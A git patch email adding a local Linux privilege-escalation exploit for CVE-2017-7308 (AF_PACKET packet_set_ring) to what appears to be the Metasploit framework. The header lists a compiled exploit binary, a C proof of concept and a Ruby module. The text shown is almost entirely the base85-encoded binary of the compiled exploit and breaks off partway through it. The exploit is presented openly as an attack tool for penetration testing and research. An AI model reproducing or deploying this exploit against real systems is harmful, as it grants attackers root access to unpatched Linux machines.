From f7504dd9d5943b855bcd48887cd5aaaf41285ebc Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sat, 28 Apr 2018 01:40:17 +0000
Subject: [PATCH 1/6] Add AF_PACKET packet_set_ring Privilege Escalation
 exploit

---
 data/exploits/cve-2017-7308/exploit           | Bin 0 -> 72880 bytes
 data/exploits/cve-2017-7308/poc.c             | 781 ++++++++++++++++++
 .../af_packet_packet_set_ring_priv_esc.rb     | 196 +++++
 3 files changed, 977 insertions(+)
 create mode 100644 data/exploits/cve-2017-7308/exploit
 create mode 100644 data/exploits/cve-2017-7308/poc.c
 create mode 100644 modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb

diff --git a/data/exploits/cve-2017-7308/exploit b/data/exploits/cve-2017-7308/exploit
new file mode 100644
index 0000000000000000000000000000000000000000..02813270d85a92dc11784943c1a95449c8f468b3
GIT binary patch
literal 72880
zcmc${4SZ8owl{pzCN#yu2~eamBGCy>BciQ>(+HIwNMHw3tOF>DICzT;jyiTAp*Zr<
zdJ^Fnjxu+226g7qx$0F%XLRmWrl6Lzg{DQo0)DhqpdiQzhmVR%!&meE*FH&Fs`JeK
zz3=n>9%h<z&faUUz4qE`uf6u#Yj0P2d{Z(^CL#4NQ@BN-ulZ&pr6ig0&ZRvtB|?#4
z5lVzSVJL^SBw>E&@yd21HT4t(J5L~N{qQ$?2mi#=&R<f`&Sd?O!A5?nTn0X=-0Ebx
z)yZ<HXGxOG)YF<Qe*0nnd@A=p{bx%8{tV@alz&F&>&g03&*Y~-Pog#TokaIf9|UIu
zSA}G|(||vJ;8zd$1z~BjovHTB+iB+@RejTU8R<<Q8_yJcia)J=(o^+mebUqY@K4h1
zEf?cYeV6n}uX=}*Da`AW{$w(}s!#e0$@G`{q`#F+kMv3ZFqz)bCw)gUUD$aso%@sN
z_CD#I$@G#w=_x)h?UVl2%SO9i?~@*W#YlgrPkJDkUehPNbGJbsOZHo;zvd;sm-b0d
z*V`w3;j77d`=qDq?UQc(#HhDSyE#)3w4rZ7#2bJjG49kyb|Eq9Tl|V6OYrt4-WIG)
zjQa27vw=U2+5~~g$MOmz$}&feR&qHIO~6lKM9X|r5W<w0m;;!?<4ifi)N#YM+EL(8
zr$(h&^|7^(`fwIg&Lkpi9ShH_vogGeb_Kp+Dn1G$Eb898ngb(Uj@tt#SU7`)BL1QH
z8d;gm!oRUHW!dJ{Os==-U$SV>04Max5;{{lS=a`w{yZk19a)*f!b?%;gHH%ClOs00
zgMn1kn+RM(Z|{H-$LlQYcD#f%|D`PPv0Ri9$Y!G}Y)t9WEzH!SA7<fa95&F;!a+wK
zJxynssotx!c%48M@sIR|E3DODB@&61OzyS@vc2H~X6k09TbQib^v_uMT}Ol{K=~$m
zQeGodPBCXal^^8`PqIqY9fZIu$E|^ZzVI}gFPz~uohemvihw0gZ(*t>hYBk@SoLON
zXQBf=VrA+bR-bCA{tMy1iG>FoZ?+4b!e*uxKc9<Ux^%c8ED%S!k*yX>+wH<EAadc!
zTydrx_Fu-LM4Lc_449kfSa6*<GDr!++y;`0o^O;lQ8{(o*=>Zz*^Tn7t~-<1UZ+i@
zHtp;N>w6I95W;_kud28icmy%@J5<Kx;?W=+XqCg#%o%=kUGalR&=y=sBtY?NQL1^w
z>v(vT&CJ=r!j|8mIIBCC$z<KcT&;_*Otw>wn3!S-AXiG{ZU*2l3DDKL=&%;=1~$34
zr3qD`4z>6X_25x|)G?>gax=h8(mit<3_RcTZNFUn4lj2#SUB!F!l@SDiSi&>`}lk!
zF*nu*^y&7-KEfBZ2i;VrEZ?RCnv_|amC}e?@qFM`N^7E?IL#YOofQvzwn;T+`cQUm
z?2l({7J68TYFA;9DW3E4^7F!@m!iIjZ-Cwxt`>w%$QQJQsFtaomW==tYVijIQB9hG
z!RBdFJS}0*X2sJQ_CyrVCrA<B_Cz)kR967$UxYn1il-y&`9Sd;ih49&T%CnNAchbU
zF*M_+h<Wx$7ZbDVb&xPHO-%c_L}G1oL$b*w%JMIiK&vwA6Q#5TP2RQ%+DFjdg*=M?
zh$!{7^toverOoey_c_A5epITFGVr=VRCswyxb&0otk!S<q@VXFb&?WCbJtO)s-BLG
zkoO)YO!yfDKkDfiBp4Nsr-7h&4uXld5&i;vqul^O!y7$E@u#CNO2Low91}(wkRP~=
zz~b`qxX}TZQrY2Y+K!w}Bv2sT>H@TyDS;McR_pgkdgFHL?c$c#fa32Q?;%v$FYIY$
z<rv?k&`tqx{|jjYwZyA5ZNP)1KnE}eD3^dYsPuD=6mu4UfF7pXnX+6{0*5vxh!s5?
z&ftwDF-inTj2<N<Gt)?}q*ly2#KNT-8e=qkG}KWKV%w&ERunm%m+C!|T%-5?leeS?
z_YH(Q{^JyZTh3g}A)B)Nyb_3qN$Af@%1)_<8o7bQc_Zv1bRd4v=6Z;BPyKdf`7v;)
zGweCG5%~~J>YP>R`HNwqp7R5dT|+QvtxcSa!4sJwcXXl?!=CtP&w0i3EwGICd^@I~
zDlt*<0B5IEGam(%x{cJVS^-VnBvhdp1<(xXzQvTVJgx-34bS?P0hRI@jWxL!3Dw66
zP?9Mhwst`xmG@fk*tGN#;JF*j1ZhAn=yu*<?PU~HJjXyvt%i;Qs&=Hvp7SQqJ#xh!
zriMCDej^c+9@)RRjU<R?U_Qg#=E02jEUyl&U`kmYD5E5*8lQIhjF#jRcYDfZ)J~^w
zRCyKXGBimLvYBFK^|6<Xb}Xa@v|`%Pp5xTUQ*F51Xv2Q6N2w=~S*JV`ssOSy{rgZ|
z#rNoc4HYLdK!1rrKPQ-~Vv4ONGoyA&lE~$#J5}*8URgNED?<bJf`W9NU#1!$A0v55
zl^JLddqWZw7{+^!Ej!u+Od^R?LkNs9SKmtrM)&Bo88qdFEeGoD0?e4Y4hvK2F*{{9
z;5(d~!NQhW$}+Vur6FwD*az$=eH&nZFu*pUi9!O<(ZuexOx|prGdHC_3uq`qm2@bx
zzF=XGmXZOZF$b|&f*{MwzfA<PYQXq}eqXY^m{!QthaMU2Iq&ksS7aNn#sGk(Ar_W5
z0cQs@)rCFZ8e?fTL<{01FYioa6d^n&ntVEiz#Ax)90?E)$P>hTAqmBM^YKgFMi2Ce
zK7{b_84CuLT72`%5TDq{lsZ`dT@SS7@njGG`BuVL9}aO`>zJ#4$w;OS=#R;6V-?k<
zjuU_e*b@H%Y$|4rRE_FdjwBo+Vwf=|Cjnhg?-tMmS!+*Lbu(C%5{&u8iC*1!bDiDj
z9~4NU`o}au2t@)n^?|f;NOJ~L8bQ>PAj;^Lc~=nQ&nuQq5xbyYMUsh6Io@x{Gf6mY
zA3%&D_vW{0<x+jj4vhs#Qh<t&3RUemi3XtuxK>0T5pz3ez<G|z%a0`jS5c-xz<p@~
z_K!$mF9r5wL!o0>c_%nVC^tYhP}9&7UQ<*HV3?ss7?aC81i#rJ`3K;KCgDBbgU>({
zdz7TXh^xV7NC9trhW|1-p6S0*j+^`$`qeCId3BRr=;&t_bXcF3b@=Ga!bc81!pV=d
z$^N4O$H2Nj{u%xLG8(rL)EoM66WK}HZ)vtja)iX~DFXaWnhR6ENhGvi5KIHO@Lbn9
zb+$>n6W`+74Tkn*>m)wpB|eHaTm_^XGw}n?^3kakkhGDVH0u~R-a+Y<uMO){^8~6{
zNY}jm6bZUz8d6cZ6-8UA2iG(D#<1fohB0H{jB3Z-9Iyrb&?4~81w2VtE-)BO&45v6
zh)xBNM?J?thM=R%jzP+RuLZbTpnSyj!i4?-4Yem;;z((*H&N|HeQKu+(mvWF->V()
zRQvCN!Kgh5E6u3=)Yn`xL2AT?w$)%_t|3IJnVAq~NxbF=tG+)X2%QO5{V<+_32+f8
zI+jv&m@`d)jCxv;OC#X+mv}*lYwA@)8E8VHW;!wrYEHwV;pytQTX~77b}o;XG$fgG
zFj;ESi>Xo(l;Y)M)VImu5v#&GQ{QXhimdc=805THyja($<4&S58f4VEEp6)vfh(E%
zEH6Srp^n?x8}1dr>DTrEV4QMmVIc+&)X88_4nc})Ph84d(W>7_rkNO8f?<=&`=ybW
zY{Qat8_okarzWkA%OH>7U<aBZu$t@t?U6_P*UxyAZCvcX|KaN%zORBQAyOPnc~+xG
zG}MX57y^!l;&|od)Mo{>pCjHdf%25kzhQ4OH536vt(~WU$FSzmEJ{O`ft9!HIuf8%
z3U$@X|0~7xTS0ItOC9$oq*K#NhtU%nj88A4QUJW0fBUCYSuxevSPN00T5jOQJzA>o
zWS;!qJA5IeZsK&!>R?cfM)wsM)fwG4ATK>P@$TcLNQ<iD2KR<L4BB}2B>~U}ypeC9
zk;(2uk4Cj9>~vJsq2FY5-(sWtc;1_o*P9{lrW<uL$lwI^Xiaoq94$!-_d#k6=4<dK
zF8KSQin#9MCA4fl&0U;TXk=}J72mfMsl<CwvG$9+)aV_1B0cTM$86wZ2I@^#uf5if
zI7F86c+dIecACqmGmFx+uK;TdEpY5O8TN6W?@8z1i~OFs*H%l70)k0tfPAQJ!#*&U
zB0nYSn$uW+&#|7TawXvKc0kK<1M(Vzd@&9A5FlCDa{mT9m#0eD{k<yI4h*=s9)U{V
zmo9xBN~6<+K!1aIx1#HM6;ILq=^s;lQjy(*FN>GaVIQ3bjV&I)K#2*-?o^B4L@Dh%
zj9&xyYrrjcnt~DkK(OL3l-Y_*ojRw6zP6@8ivgN60jrOZXPhY?=E44C%6m5ccy=Di
zn4&Jk!>4dF*r%vV@dfmD(dnrYouz9<=d71R=iGNh=lv1U`EZNq40MRj<(<(`KCoco
z5~87N@m9cl$76$rC?ND|sEnfz74a{Xps||ZRjZ*AeASX|NwUAmg=KSSBEU(^DT`7+
zhuT*{K0*=>5#hBaEMSmhaAGvp6-tO9TmF!K$<zc1f__KXC`9XEm5_xwlwq1)3I=oY
zkmDuu(4TAMqsE_MOd2=_r_*ksv|c>||062V9!4@mPn*l1@l8mxX)k~z_`awwieCWG
zEkjcReu<9N4`52P${v`@2xfR1=Ezav+PEu_3IvzqVKnq+3{#`a2{A8p7z)7{Isb)1
zBsy3+jB^+zN2N=W7Vate6QpaTN{o_AdC530dGvW+XMVb5Ba~lHNy4c8I$iP>PAHd`
zja6urA>iO&E_w_dNQ*aeo+jVqt?;3xzu>K*GQ<o)vtwW-8FmOHXamx9?1>RGioc>%
z4Ffj`rPKEjEDMY_ybGvaBMoaWta7mKIB!}ZGE&Cj5-U?I>U(x#>Bm&~FDPvA)kAWo
z7B^DrGwIa9uyv8TjZ#-274LiLeNh_XUcT%oK1iwe7!b$ky(|r}n@=6Z-IRK>0Wq9d
zcwHKzjO$m+7w>|wu;o*FaOHPpx(DvVsw`}2pqyUI3Y{0=tHYP*l~#wORI}3MoV;AP
zPr3Jd$}Q|&?l?#^xbZbi)39YmpK=_JvCJ&!U2b=}+y=gYD(;}RPDkCFXah^D>m+$M
z<LwaMK;TZwzYh6$-$(CP(R<i(^uO&wc<2}SW#zlzBxH35ELc$t;q>MVV&S1RlxNyX
z?NmP3_G88Y3aVe*&#NBywo!wIB%>);8zlV!=~^YNeAMC-1phYD4TzV({!Qd6(OOHO
zF}|gx_@)^okyqpA?gsunlfI!%@x5sl9x+-ZY`TNq@F&c`Rzw99Lv<pKugamI`Y>u?
z<x%C_g7Ab%3$QbgtBph@QGu{9xhWAFi2@5`kR)!3is~Txs!j-r<=0dnNlXNc@|E^0
zaE*n{4mjyV<s=p4s|k#$m9Y+ds(13zRcEusRfZumKtjFZ`dzHt{99&fN_3!+8A9y8
z0bC<gfn2P8@di~Ldy(Eas%P;g)!6Zi4HM;vPpM<d!P+W(fAeOe*<q^LhF7M1ETTL3
zC<mD9tpCy{`v;r-m#Du^BqCRSy}G}Ck|pY~udz;_3M^U>&6Srq7777t)a_V^_6hR2
zS%ECtA+hTNXnUlHWx5^tP~&)C$i%m!aQNrw*@Y3^QuBZ<6FWSciLG-Q8X9IW<!oVO
zgO4bwK30ZQrUK75FeNS38|)y@2CBk2^?U=UIq)r0&Gi`X1L~0%&SRl=+VVL!ine^p
zpa^DuVdq;nUoy~GCSY?0M3xa_Xg}p8swQ+A<^NPi<%148)u>pm;OGE}_dUph+Y{R`
zeEUYVh!}ZPN_4~Yv;2<aRvr2bJ(L2b+`tlzPfnrvwBLm51E=)kyaAd*eI5S5p`l7`
zC|8$3M-@Jp%k5Yi7(tcOG{am$$7(zSmoWJQM=Rb0|1SxJbt8-`-g7&Bs@q}Z{@HKd
zM00GQS->-oOtG3Q{P>h8Q?^n+7T*Lxsih3*w7a#R-G2%8TaW>Fu<2WtfY_hQ3>=DD
z>LS>^02I1{m_DarhSvWOjiV8B{$>~0_z}n6whN1`i6KmGu<9r0G)S|gnXJ5V)(oFI
zzaEU<!j#=!<pK>O7QVp;!6?L3q`ilhDkpu)L8k1J5}#tm_~y$*Vm_oDPH<EwN8Ehq
zfsunz5j?sO0Qjz%@-?P6`8j}ui?C0a0XJe{LMy?5)Q*Cc5EOMp<gc7GFGyR`ANx4i
z2uuvokIyNL#NK`y!&UhP<dl_EeN_TMa1;b=N^4;=>Xn3I`U%(>7&$NOa}<DkR>%Z;
z5bUH>JH25a5UnZSjSaD1VplA}l<rN$N^RbFnx0sB{O-G!4ih(iIb`vm8iowc=#9ij
z(Lz%g+PArE4&Mo481&Fim1d^INy^V@UEq(hziYozggq~?DKV#kk642r<q2rVnqP2K
zWEy<{07FYL$~s*$7S*65k@e?vR!w;teoZ<N@HHeN2C$!}OEYKr%8$$_gw^$pS2<O4
z9rAt3S7<Mcxw8i3G(cjxf*ya&nh01~bg~sGiNfRhEy@<nMTSPv)qxwJz-sP8wditQ
zPTro-M8HABmJa1wP01uB02!G~+qU|<V2VxA=FFAu;Z3bUcP5GZ97ykOXqZKQn|!IO
zE+Int2WZ<dxf&W(AI@q3L;qGXSL2dPwZHQ`NC)vcpENFf1E=e3%BRXl{?R_g=g4!T
zD|4CRClV$&v_GM+51pRp235H%OzGhX4p#oDuY7lDd87uWI?-b+9H7z%$zK+Dqjj(n
z67o5_S9I6$s+8!Qxv^28hNMJ+Do%I`cR@-ZEj5MdCYgDYl=u@J4PbiVt{GnCJjBFm
zm@_C^puG%Wj7Kx{;mz3aQyQozl#|>aqPc%cQh8L_Uwfm%cg%kqKtlOBrM@PUR}$K_
zv=I%lfu@2KPi-Eh8RJ~Kot1Z$Ds`K#1*ESW>K>!3Ui*(C&a6DhPV9cNTR^{8*-Eo<
z`Dto~!rO3Dx(y`&x;r`IPh-TFA7texAvtI-l})zU33!l=v2Mr@?TdyYlCniqRv}Bv
z!m?B@x-`(gt3j|@1%E)#(Y}E}CKt^OJfNe62Kz8Ac6EW3%{3fhc^6k6Ck>qIfg=?0
zDuj0FSU&P{F%0>*<0CLR_>gnS;#_Ze+!&UaU*Y<L87^Axb{nE6%_TXLKZa}R80lNu
zhK0qB0dZ2x24`!qKuJoa#4CkQK5!!xS1wmvH5-lW=;N4q`9Eb6#_{9tB)_7T#qZns
zJ0Uy<tx=c=wU>y`M70prQoWffRazme(w)*Bg%Q%H(4VtrY;Yh0L@_c7)DIj57@CMz
zaL_Ic{!fbDEUctCTMI)rN<+u_T15<o2vGea2lT10I3oP}EyrwB&efJr^*i!?K>0e=
zpzH%<wGC)0#0y{CElJv4dlhN5Fr1LFU#r7MA=Zkg0HSr`!>1&)eN+n56IEgI58&*l
z^k<UkR3)Y3lfy5gbdc7GbV3?^l+rQp?$=`c6~O@ewHCbA@{x>>zu^Oug8Fy6z^6OR
z1~2>$q`+c4!jv|j@(|QBcwt8sf-j6n21^z4No~{nL&<lWRz!%D{SX+f6tAApank$u
zILsLHgl(U8FEC*I_1Er)drB@c`wtiH!Vol6{W|J8fSoYhwhI3Q?MCi?d;+82syR{C
zt>j}Qn$fw`c{CWMxzfGT&q>WeuXeKXt-r+B?SgRg*`$6G<{?2FJdP-gYHj2llQ-w3
zCV-lckZZ_&EwZ5f%U2d96T4b5i9oS$GeANSrD17aVLR!>LClHu!369soGLu6Exr-R
z%g<@cfC00*VdDW0@bW^#jY30UY4ZXURbq;26HrWP?P{IVfcZe$h@pet7<c`@V_?8j
z0*MeU7v&7-lhbXK;lP|#g}bPPI?n&5UEt_quib!2c;+lgIgjb^JD3mPQW@+jF*uMU
zSH8uxq+Gqt*kDADjz>Yz!gfRXG_$%`KUjWEoh;iX7iZSkVKCh!7heGwAuxvVF-gM5
zAoA8E`6L;IyEsLnC2BeOm!!oL_6T8>s{j?V94xJTqq%^GDPS1}Vyc^g%S`psd_pp2
z*EHyOGB*bno@OB!d1PRi^(@E=>a=;w&nG#6^{&y0G%=p0eM(HKHzU#sWpAX3v49FN
zraop(*2|~MB1I;ev}#nNUqZ1?e<<8lcv}BYNJv?7_Ee{K$nlIN1JtPrIX<z{68md%
zHqu@=otiN*A>Q4fPEW{ZCRSSI6Lz^fqcWGYwpMvD4A&xTcL&SPDvUI+DA|!PH(>~#
zLPwFT`1@;<QAWv=KT1GzHLQi*f(aU}<8y<j@Hi%J<s2aouUdl)SO8Y-fu-nX1?J&?
z?NeyJ@M!t4DNvx@Mk*nE>p~W4_GA8?QNfhkEBF%uSTK^NEo82|0HT9zS}}p5_++5u
zBYAUTMji{lPijoc-b}Gq7VRyJVhrv61o#r(^#Ocb(&u<k0JYy?49Et+L+oY*evQuk
z)oXSEU15ZM^@pjc?E{Ta74MLyGS(9l!!k9-Q+NpNf%&{&`+X%f39&(wi<oP2K5S1U
zzKVj`TRfpdXbwIb0mH&`D)bMu<-iqt7AOp^P>|a>pvuyw0|uN)p&3aXjIxOt3^rH3
z5Eux}GMA7&3P61Z3oizzCfhK`7Z1cB=W`v0FM|L^C)-g4ri#f$$!C7@Nro+@Tj}W+
zQKIm;b~T~QgiI!7iRK^bJ`BWjST>YCg(B!kvGyjd?pnM<XhqEp8>sMf(iHmzW;W>q
zv<)FpO8`;cxp6(licjhA5|;gj<}$-|Qg|B1G8EJ}N!)mN$l}46u{rHE427X-3GxJ*
z`7=MS2<v|IWBIwHfpa%BXR7O}kF}ym5ZEx>XfPJ}Fc?e7%wztaicYN9M5oU&Pjt?7
zREW+$I;sFJI$z;SE7AFu<0bz6u7l=j(TN!hPo@SP9sD_yOvKa*AhjmIGpB&Ek&~zW
zXCB_FHxn5Rn5F-3lj9iPiyXE1y8pEEZqrJxL%M3Y8sC^V)Z(Fdi7lkW9-3hd{Qtv8
zrJK}YA6Am|UBpU|_mh`EE(YE0!-%jXQ&o!%$z%<kpEZL9XPz+tF=Y5a%Y&4VK7svm
zMEf(uI27U1v~+CM`(aelA5n?n$@y&jWcy-~sbz3Q&d6^R`WNof2iNjN8AR<NAgR+v
zD)n7^LdPZL6JyX0LTXY`G{`5i<?cb^s{0_*h$bijYIs}z&b=++{_>gYD+ee|G9pnk
zC)t$#*nUPBCQ}(&Jq>F{NK013zXA&jdh5S}f!j#X|Lb2tiT@CE^<M!ou~vx9CmsAR
z$j1(FY{LHlj)jF-F2PMRSD$$stgjqMEU|HxOfz51lf6RwM8sW!NpeJF2&n?IU=&TW
zw&zoZ65qi423}tgb7*1*>-t)*FIau4ehlNk0R}Q=G8Pua+ClQs0{Luq<<-U8wr$I)
z%zd!)baf-BSm`>oGV8%ee+1oTx|Ik^V7(*i+Zs-1*~#`&K7&gI_5&6@f5sB30U@)3
z-6V*i)gaupQ&g+)BrRAX)?$&P>~?;%QJ}tuQ=|Hr6>rt&=vz|udX+;=oU)tbFZUWs
zPoU_MJPvNG-LzF8s9Gm@y~C{>HB#%2S|8XYAjfSwiq)3(Z+L~+6Yivf<BI`fDFESz
zNmPAo_6R{}f6K8J4=iB|py@8B1?^ajrKPA=Xp6K@aJ0imrmeo8#=_5~+3gQGZ2m#g
zhrmlpU^`ma)}fEX>lVBw(}9Dm)f{nS$0dudfCuX}<Y5k%J4}-J>=vd@vcSUy-x}aB
z6WDs{**hOmM@@I#OVz9l&??#iXUqx|M-7Xq2D!t|L{IB}?J@XBM=UgQ?kD`12#`T#
zau7Ui_o&M=YwaKtymTvPco=hcLYqf+3>N13UM$MNWpXwo!z%X0reVq<Gi@PJg|=(;
zpr<u5`|h?AZO!em-(>jB37=!38%unLBsbe7`OJM{XgW%r2Bmgvh{|YEwj^)Kkk1Wl
zvmAU9f_qa9Su$;wE%<P@CYrGL_nTXr_3y|+%daXL6R@>yZR=<~xUasgxvitESvP-C
zzwapcUeeYKkcIGeF7&BB$0Mbxlv5WUSs3*xjm{`+bifqg&!**JLF{uyh;8^Qz+VZX
zy;bRwMz`ZP1#MfwkcA~r`W+6RTGs7;62!X0_c(G&{$Z*+J5oNFL2Q-eFRgO@=+$Kj
z^$sYvapS<$)n(mn%N+MEK>2&gclB7+jvNGuEWjLjPg|tzA;&%K_c&~LB6p#QmCtn8
z_RM$K+)qxp)RP@$t|s^DqSmc}5$!SY`Fhdwd2m-CJJi0?;(>(<m9{XWvBY#;d+agH
z(whFaz?r?R^gpj$ms5ilt@M_ESL)meH<{1bREj_&XD7DUR#?gRooPi^Ik%IQj4-Oi
zB=w$4GLX64EUA}YH$|N=IxPq(A@G4{8zjN){6@PQ>+arCa3j9c1pre^vogd(s_vwv
zv33o?!<K#w3tEzzOnfVQI24v!&ZC9Rlxjw*53I6bP3u!Wqoh6XLR^G6DUpO2ui8$^
zACDo1j<!o;X*6~Xtm9Doqn7u{C(C8-lGXu#LSM)aITl_H$z4cB#WTnZonG3HSziAU
z7=e*wGdjxcxYq|DTh+Fl1xQWy(tdcTsh7NRqnX66Oj4$thav++$$kjSzF6ykV$^~9
zb_BLjAFwcF397LM%0ZCc7q&h>K6HA;ZF2Vrw^HX-SDY88?;t1sh046}Fkq5TnrZ!H
zYAM|1?fOQ!)2x39eVdD2O(q{V>z7FK3hZfTd*u^muj@o*r*p?UCjGB)Wt*XT7OIm+
zY{*7Mg}bPMU0=Hq4OJMKuIBy;iD;;((DW;JcX6m?X65UyHi<7QYKXGJUAyDb?ha~=
zlxTu1`COfguL$FSLc}a73HOyzY4=ID>8w(A9^F$SzWuqrS6+_woSDg6%vcp<Ny?=L
zZ_s-f)eC%3>!RmV=4@eg@eH4<b%lAlI(D!LRL35MZcP!6-uJn_TkP<GskZPep@wD}
zuT%4))Kt|Ran&!fV&ahCocxw1nllTOed4nbNqjrvY{cg;#AoUYn?vp5vvo@6l{?89
zG8!Z}n<x;n?ra82Y-MWhE=IG+kD+ueLP>_enLy%ed#>vYHuTgrPne<m)k!99gvjx1
zf7XMi`%|4^SK%%t-gO#_ya7J-E_11CpBStMjjx*mL#n%pd2qwJwl5xdS~_p?TieIn
z@&qQ9er=ZFcq*Mc<F1xUF))m&lDSRux?n!*wl<52fUJ94+briohMNMBLrHCBHMAHs
zTAlOr{jt5Rzv&k+D=z&uQ@2uB?MgI1KORApa?Bi+;L3pTy0$O5BpEeBvXU_AZT}N?
zGPw?-w8JM({rdaj#aSErUqByf4_Mx(>B{YDSTR_V<L8&<NNR}*irnFB(6cbC92tp^
zpulsifeOeb=k5}_6kc&2%fGzBX3o?!8#!m|bT}hB*=RE8v2-urO;W-jdg|B+_~4M6
z>~efT0BWsM@8>O#FjFUU8d391WOdBd!o=w<a7+L=hntvnS|+AP2!f}6Bc`O4&U)7#
zam`>-52`QEL`bFgA$Ti2&W{Z2B<+DA9#^aQw2mD}%zrB$^qA`O1+Y+jn8Y5#RH0z1
z=yn%I`D~$`!V=r3oMFy7mS|oHk9kw0P(Zs#72OhmOUv6a55TztTfjFOQ;Q@=M)O(2
zy}Be(>e^qjx}sZrdIeQxI>R^q+)mByY7*D{5^0lFvoo#gQc72;1DOu(C~EGlZyWG!
zz@itp8pXJ@_fohU0Dx_^k_BQ&=Q09q#2W?c2(Mn{xNkh3mA6Xa<wB`CH5*f+HkjJy
zI_@9fbH$fjmTcZPm=^;%UUjOqG3bzitH7(?nT>@YYV%_B!z-nYMM3><kd!Pg27b(D
z<Azp|E%1=zG2T6-%Lf9g6ob7a)V^W@)yvdCw)Q8iLYYfjl49pK^11Adq{~o+IGrpx
zUQ78dS<lu!0<iwRIwKo;gUeZJqS2a=6YEAX(vD`I8o(d=5Di6@qWm6mARMdzif8X8
zk3_NWH_!z?KpnB+%#!Ko>PAz6{tb*)-V&qbw7|7#6Hq$T&S1{iQcZ`sHg5Pz__S%r
zfOrFN2mm=4_?S)NuI!*Zs3{jW<7`a4t%cgD#juViRbX>A#3n&r)ft0RZKO6223GA0
zg26KGG17GfBo_t5-@hTbM=0!o>?IWV)LsDq%oe-r9*09|6-yym<PgOS)ypADK5tK9
z!f-mk16h6Sbzq|H8CsEI4do+2qa8TNd07<uG{`o#vE9x%M$?+RU|RSv{gp|k{ZbXC
z2{G7)N!b^kkEAEf4(NXSgi-#>y@|~}1!?->s->n;*vFM48Azi^wTw@)RYjxxhxj-t
zbsht9WaP7TUe{*v>F<D$$rBt{6MhN52^_}W@=tuq3GEHU1;f)LhJHyFJQ!K#7Heml
zBw5FBJeOU0S=G`E2ko3iGKqHTC0-#`L<!6<A7PgPWeShiD)8#_xE78?thFjz<(OSQ
zGqQ51`0|d$Hmp|?5zN>Gp8cubR(19oF+^g9wH(937SILqne57myh0a)6$;OoAKRC`
zs*VQ#Py#w>(nGN__}Z!MbqCGv@Vl1^FyZt&Fp6^pzfCJYnDQIOGE<HBC|~)<5N2yw
zG?u+v`Lg#;8<tlH*MNtWh3|l&h;^?r-Rcfw2b>!%WuDOKNA1<y1v`dA*FGI<0a!R%
zA)=3IU#L-B{S3^fWG7rFh8jU2IteX&G1)?>xl{{ps9Kuo2wY3mp@p!;$ZUuPe}8ey
z&?sN|nqj<AxAI1bp`TD6Q7@L3Z}Z>q&l-Xaejhc2x90YAYkcL{SdM@W>SLv;s|8L2
zNvYSd;z3(d4b|o%rdcvZV|kOF<xviL<>my=QIc$kwKn;vB%gJOt6rdm4Y?%L;_xyO
zikXfwY}D5Z?7>|(%bEl`!E{z!KQ=?10+()9C2T1DeR7Ha8w$$ZKMM4RQNDC;Yz98*
z?MkX34|BpKW$Ze7w|ncpG*1%q&3WVuo2TEvTOPn3T_X0Gg}6<_3$)L}5G!zV1v3}{
zGrn@D7jU2ezGmW;7<`(nX(B(=4B;-pu3&?IuzPhx?hq$r2CP_!?DvSZ4e;m<SlqAr
za3ay2z>K{~j{j6#HIqEH>d-a6!K2*#I1J82hkPbWTy--y(TC1>3=*O2m{xB7FP=yB
z%yTP6vEj)|=V5*<ishufut13=Fv}A4^StE<Zpet8#5W8G8$YZi)zDhlCr)aTx1$pQ
z1q0Zp8vZ^g%Ymp+K451`3mlm^WU55HiS39&G0R89CojJx`y*-fTmk2TL%T54ed>r!
z*eMc&-vMXI=`B_<NYfi;U-SD|MM91urKX11=Xm9Wr|SXgp{wf+%$f4REch>^)w2Zs
zD?(x*UceC}Y7_if<9G>AZ+RWJe0<IrbJh8j)>3tjMG}2q_(Wf;9^f^A=to7?)ye@$
z7U${Lg7KFa1=SIQfOXN8iU#Avt4=lnLqZbWz~E`s`x_M>2ZKoV=P~tNUawENCnW$Y
z5n;szzz4-$;8ozoZho}CRCUlKhQ3CN@wqhF#S}&}Pk=p)w173ZOAI{<?Z#9imIe_?
zKBtB*^|_jSVrf(CXOu~uYX}H9dq3!qHXs?>daoFSpqpsGuMYA@>?ULyg8AuQOeICy
z$Cx`fd7w-mL`r`ic0B`GK6T8Mzy?ZcF~nE;l#^c3`?XPYL>`dPlv%3Iw-Csqmq=A4
z*C9I^Bq?=if<A!<F-FEVrxWV>9=r>193;T!*|eUX%{k7%n|as-C@qhbx(<s^90Qr*
z8)<AF#2XDMA9hd8+TF8Z1VqHu4M_E2XLX&=c@U<gxQaT<Yuc>W5j9Ef{tjsgET-ts
zjV*X|kWGoXmDAcch%i<fLhZBf78Nu0?qUlGpE_a`$W3uhALvmIq&`ZO!w@CRVbrlj
zK34~y(>$VYo3oXhe?I{NNi|<a3@UKDI?+6vTP*E#yWnUM*N_*ArZ_qmtGSg^+&I)e
zI|k7}%ZrQ<iQR7H8y~hzUq>==mr?;P87puqMQd{HC1ex#VKz)~z@l&~2Y3dWs0EQn
z$=H3Ssr26OW3p5KC+oih*)ek*MYvW94F;85uNw<XG5BMy7N7(tg~wKfPWx}9*e9;!
z>W-LMCMF8)1_ZBq6A`Z*?;rR?;?r$xE67Zy`Ef9Z%F7d~1iv1OqcUwyJI#Z)azXew
z5u@?yt%f#AtgQSp*=DpUMWq`Ch7GPW?R7*Dki_`7u#ni~m%5Hs7WQFP?*;}?#62FX
zL@?O~-@?AwrPw1R!SZAFz-A;DDhpx|aYDyy`V_KP`3_A}`9y~{62<iwU|^B`<W}N+
zY%Hv1({Tkf|4Z^V3V4`JeGQ2%BJ&kL#(oG7k)cRCOe2MfQYG#~5Ee;^Xv+`>AranN
z^f*?&lv<$u6s9&wdW;Z<L$pa&c$~cS7>U{<3?pTWgw0i@4w_f0`tV8Q3y{6bS7yl_
z*pK%Jh3#H>`8*-uq$=lm!*geQqn>$X0P`xI+4w8MUp^_9cZ@VpK(*5(ZIDMby+dYi
zs2v+}{$koeLz;w>^FW=?EyjdbF%VPzsKB0l7A2qg^mL2v4k8x4aQQ~`bK-ToTl5^v
zZlK+Pxq{zHHJzFRwpDK??xnXAjs1PBK}X4r8FII!as)OD-sbyZ$<2b*!x|PS!y52^
zhCk7kRoG12>|o(LZ41N|5emYZ>FA`U;XJTu$uK#7J+^8iRyh82I4kR|e>Wv|=!Z&z
za7lvk9f-!nnibF}(IKC`zS5?&0E&VvJCWR>4<v!sU}wM}0~p-&7yFeFx&t9tie?x)
zk_43x&Burn=)i34-Mi6MNT3J{8qu_KW2fhnnZbw{+ymoVT;C!e&6dxamt;?{2Y#(%
ztM(&t{bZOnx0;lCS<9B=<|TU7S-bx$>XRedG#A(p!mQr$K}QX6VG|Rk5H=gUsNbrC
